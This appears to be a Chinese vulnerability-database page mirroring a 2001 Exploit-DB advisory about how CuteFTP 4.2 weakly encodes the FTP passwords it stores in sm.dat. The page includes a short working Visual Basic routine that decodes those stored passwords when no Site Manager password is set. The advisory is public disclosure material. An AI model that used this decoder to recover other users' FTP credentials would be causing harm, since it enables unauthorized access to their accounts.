CuteFTP 4.2 – Default Weak Password Encoding

CuteFTP 4.2 – Default Weak Password Encoding

漏洞ID 1053555 漏洞类型
发布时间 2001-08-23 更新时间 2001-08-23
图片[1]-CuteFTP 4.2 – Default Weak Password Encoding-安全小百科CVE编号 N/A
图片[2]-CuteFTP 4.2 – Default Weak Password Encoding-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/21090
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/3233/info

CuteFTP is a popular commercial FTP client for Microsoft Windows systems.

CuteFTP v4.2(and possibly earlier versions) uses a weak system for encoding passwords for accounts on FTP sites. Passwords are stored in a file called 'sm.dat', and can be easily retrieved provided the site manager password has not been set.

Successful exploitation of this vulnerability will allow a local attacker to gain unauthorized access to the FTP sites used by other local users.


This piece of VB code will decode the passwords stored in sm.dat for the FTP accounts

Works only if you have NOT set a password on the Site Manager!


'Decode a single character
Public Function CuteDecode(i_Asc As Integer)

CuteDecode = ((Not i_Asc) And 200) + (i_Asc And 55)

End Function

'Decode password
Public Function CuteDecodeString(str_password As String)

Dim i As Integer

CuteDecodeString = ""

For i = 1 To Len(str_password)
CuteDecodeString = CuteDecodeString + Chr$(CuteDecode(Asc(Mid(str_password, i, 1))))
Next i

End Function

相关推荐: Cobalt Raq Apache .htaccess Disclosure Vulnerability

Cobalt Raq Apache .htaccess Disclosure Vulnerability 漏洞ID 1104324 漏洞类型 Configuration Error 发布时间 2000-03-31 更新时间 2000-03-31 CVE编号 N…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享